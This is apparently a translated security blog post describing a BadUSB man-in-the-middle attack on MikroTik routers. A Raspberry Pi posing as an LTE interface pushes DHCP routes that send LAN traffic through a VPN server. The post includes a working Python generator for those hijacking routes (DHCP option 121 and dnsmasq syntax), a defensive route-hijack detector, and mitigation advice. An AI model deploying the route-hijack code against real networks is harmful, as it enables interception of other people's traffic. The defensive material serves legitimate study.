Hacking Book | Free Online Hacking Learning


Using BadUSB to control the whole network

Posted by graebner at 2020-02-27

Launching a man-in-the-middle attack with a Raspberry Pi

At the first BSides Dublin conference last weekend, I gave a talk on BadUSB attacks against routers. The presentation covered a range of BadUSB attacks against Netgear, TP-Link, Linksys, ASUS and MikroTik routers. In this article, I will walk through one standout example that lets an attacker take control of the entire network behind the router.

In the figure above, a Raspberry Pi Zero is plugged into the USB port of a MikroTik hAP. From this point on, the Raspberry Pi can intercept all traffic passing through the router: a classic man-in-the-middle attack.


Now you are surely asking: "How did you do it?!"

Attack principle

Let's start with MikroTik. Many routers of this brand support 3G and 4G USB dongles, and not just small models like the hAP but also larger rack-mounted routers. By default, these devices expose a secondary USB WAN interface (an uplink through the USB port).

The configured Raspberry Pi shows up as an LTE interface

I configured my Raspberry Pi with P4wnP1's default network device descriptor and the VID/PID of a Linksys USB network adapter, so the router recognises it as a new WAN interface. Once it is plugged in, the router sends a DHCP request to obtain an IP address for the new lte1 interface. The DHCP response from the Raspberry Pi then carries some additional routing instructions whose purpose is to "direct all Internet traffic to the lte1 interface". The routing instructions involved are shown below.

Router routing table after accepting the DHCP response from the Raspberry Pi

Samy Kamkar, Rob Fuller, P4wnP1 and, I am sure, others have already used DHCP in BadUSB attacks. However, because my target is the router itself, every host on the LAN is affected.

Of course, the Raspberry Pi is not a real WAN interface. It has no Internet connection of its own, so at this point the redirected traffic simply loops back.

USB traffic loops back

My current solution to this problem is to tunnel all traffic through a VPN server. The routing instructions pushed by the BadUSB device exempt one specific destination, the VPN server, from the redirection. The Raspberry Pi can therefore send everything to the remote VPN server over the router's real uplink, and the VPN server forwards it on to the Internet.
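The routing instructions described in the two paragraphs above (send all Internet traffic to lte1, but leave traffic to the VPN server on the router's original default route) can be generated as follows. This is an added example written for this edited page, not the author's P4wnP1 payload from the GitHub repository. It assumes the router's DHCP client honours DHCP option 121 (classless static routes, RFC 3442), that the Raspberry Pi answers DHCP as 192.168.7.1 on the USB link, and that the VPN server is 203.0.113.10; all three addresses are made up. The approach shown splits 0.0.0.0/0 into the 32 prefixes that together cover every IPv4 address except the VPN server's, so no route for the VPN server is pushed at all and it falls through to the router's existing default route.

```python
import ipaddress

# Hypothetical addresses for this example (documentation/private ranges, not from the original post).
PI_ADDRESS = "192.168.7.1"   # the Raspberry Pi's address on the USB link, i.e. the next hop behind lte1
VPN_SERVER = "203.0.113.10"  # the remote VPN server that must keep using the router's real uplink


def routes_excluding(excluded_host):
    """Split 0.0.0.0/0 into the prefixes that cover every IPv4 address except excluded_host.

    Each step halves the prefix that still contains the excluded host and keeps the
    other half, so the result is 32 disjoint networks (one per prefix length 1..32).
    The excluded /32 matches none of them and keeps using the router's own default route.
    """
    target = ipaddress.ip_network(f"{excluded_host}/32")
    keep = []
    current = ipaddress.ip_network("0.0.0.0/0")
    while current.prefixlen < 32:
        low, high = current.subnets(prefixlen_diff=1)
        if target.subnet_of(low):
            keep.append(high)
            current = low
        else:
            keep.append(low)
            current = high
    return keep


def covered(address, routes):
    """True if address matches one of the pushed routes, i.e. the router would send it to the Pi."""
    ip = ipaddress.ip_address(address)
    return any(ip in net for net in routes)


def encode_option121(routes, router):
    """Encode routes as the payload of DHCP option 121 (classless static route, RFC 3442).

    Per route: one byte of prefix length, then only the significant octets of the
    destination (ceil(prefixlen / 8) of them), then the 4-byte next hop.
    """
    next_hop = ipaddress.IPv4Address(router).packed
    payload = bytearray()
    for net in routes:
        significant = (net.prefixlen + 7) // 8
        payload += bytes([net.prefixlen])
        payload += net.network_address.packed[:significant]
        payload += next_hop
    return bytes(payload)


def dnsmasq_option_line(routes, router):
    """The same routes in dnsmasq's dhcp-option syntax, for a DHCP server running on the Pi."""
    parts = [f"{net.with_prefixlen},{router}" for net in routes]
    return "dhcp-option=121," + ",".join(parts)


if __name__ == "__main__":
    routes = routes_excluding(VPN_SERVER)
    print(f"{len(routes)} routes, from {routes[0]} to {routes[-1]}")
    print("VPN server redirected to the Pi?", covered(VPN_SERVER, routes))
    print("Other hosts redirected to the Pi?", covered("198.51.100.7", routes))
    payload = encode_option121(routes, PI_ADDRESS)
    print(f"option 121 payload: {len(payload)} bytes, {payload.hex()}")
    print(dnsmasq_option_line(routes, PI_ADDRESS))
```

The 32 routes encode to 240 bytes, which still fits in a single DHCP option (the length field allows 255). Whether a given router actually installs routes received in option 121, and at what distance relative to its existing default route, is router- and firmware-specific and is the first thing to verify on a lab device.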

Final architecture

Once everything is in place, requests and responses from the LAN flow normally. In the traceroute output below, you can see the path the traffic takes: from the MikroTik router to the Raspberry Pi, then to the VPN server, and finally out to the public Internet.


With this setup complete, both the Raspberry Pi and the VPN server can observe all traffic from the LAN. In the figure below, the client on the left browses securitybsides.com, and Wireshark on the VPN server captures both the request and the response.


If you want to learn more about the technical details, or reproduce the attack yourself, please visit our GitHub repository. There you will find details of the hardware and software used, as well as the payload used with the P4wnP1 framework.

Future work

In practice, an attack device built on a Raspberry Pi is rather bulky compared with an ordinary USB stick. A USB armory or a Teensy could be used instead in the future.

The photo above shows a USB armory. Many other routers share this problem as well, for example Cisco's RV series.


Finally, let's summarize the key points for defence:

Do not let others get physical access to the router.

Disable unused USB ports, or at least the USB WAN/LTE interface while no dongle is in use.

Check the device regularly for unfamiliar hardware, and check its configuration for interfaces and routes you did not add.

Use end-to-end encrypted protocols (TLS, SSH) whenever possible, so an interceptor on the path only sees ciphertext.

Use a VPN to protect your traffic (for example, on public Wi-Fi).
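The configuration check suggested in the list above can be automated. The following is an added example written for this edited page, not a tool from the original post: it parses a routing table in the key=value style of RouterOS `/ip route print terse` and flags any USB/LTE interface whose learned routes cover most of the IPv4 address space, which is exactly the footprint of the attack described here. The sample table is constructed, not captured from a real router, and the assumption that USB WAN interfaces are named `lte*`, `usb*` or `ppp*` is a local one that should be adjusted to the device being checked.

```python
import ipaddress

# Constructed sample in the key=value style of "/ip route print terse" (not real router output).
# Routes 3 and 4 were learned via the next hop 192.168.7.1, which lives on the USB "lte1"
# interface, and together they cover all of 0.0.0.0/0 with a longer match than the real default.
SAMPLE_ROUTES = """\
 0 ADS dst-address=0.0.0.0/0 gateway=192.168.88.1 distance=1
 1 ADC dst-address=192.168.88.0/24 gateway=ether1 distance=0
 2 ADC dst-address=192.168.7.0/24 gateway=lte1 distance=0
 3 AD  dst-address=0.0.0.0/1 gateway=192.168.7.1 distance=1
 4 AD  dst-address=128.0.0.0/1 gateway=192.168.7.1 distance=1
"""

# Assumption: interface names a USB WAN dongle (or a BadUSB device posing as one) would get.
SUSPECT_PREFIXES = ("lte", "usb", "ppp")


def parse_routes(text):
    """Parse lines of the form '<n> <flags> key=value ...' into dicts; flags may be empty."""
    routes = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].isdigit():
            continue
        flags, fields = "", {}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                fields[key] = value
            elif not fields:
                flags += tok  # anything before the first key=value token is the flag column
        routes.append({"flags": flags, **fields})
    return routes


def interface_for(gateway, routes):
    """Resolve a next-hop IP to the interface of the connected (C) route that contains it."""
    try:
        ip = ipaddress.ip_address(gateway)
    except ValueError:
        return gateway  # the gateway is already an interface name
    for route in routes:
        if "C" in route["flags"] and ip in ipaddress.ip_network(route["dst-address"]):
            return route["gateway"]
    return "unknown"


def hijack_report(text, threshold=0.5):
    """Return {interface: fraction_of_ipv4_covered} for suspect interfaces above threshold."""
    routes = parse_routes(text)
    nets_by_iface = {}
    for route in routes:
        if "C" in route["flags"]:
            continue  # connected routes describe the link itself, not where traffic is sent
        iface = interface_for(route["gateway"], routes)
        nets_by_iface.setdefault(iface, []).append(ipaddress.ip_network(route["dst-address"]))
    report = {}
    for iface, nets in nets_by_iface.items():
        if not iface.startswith(SUSPECT_PREFIXES):
            continue
        covered = sum(n.num_addresses for n in ipaddress.collapse_addresses(nets))
        fraction = covered / 2**32
        if fraction >= threshold:
            report[iface] = fraction
    return report


if __name__ == "__main__":
    for iface, fraction in hijack_report(SAMPLE_ROUTES).items():
        print(f"WARNING: {fraction:.0%} of IPv4 is routed via {iface}; check for a rogue USB device")
```

A real `print terse` line carries more fields than the sample; the parser only relies on the flag column, `dst-address` and `gateway`, so extra fields are ignored. The 50% threshold catches both the two-route split shown here and the 32-route variant that exempts a single host.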

This article was compiled and translated by 白帽汇 and does not represent the views or positions of 白帽汇. Source: https://medium.com/tenable-techblog/owning-the-network-with-badusb-72daa45d1b00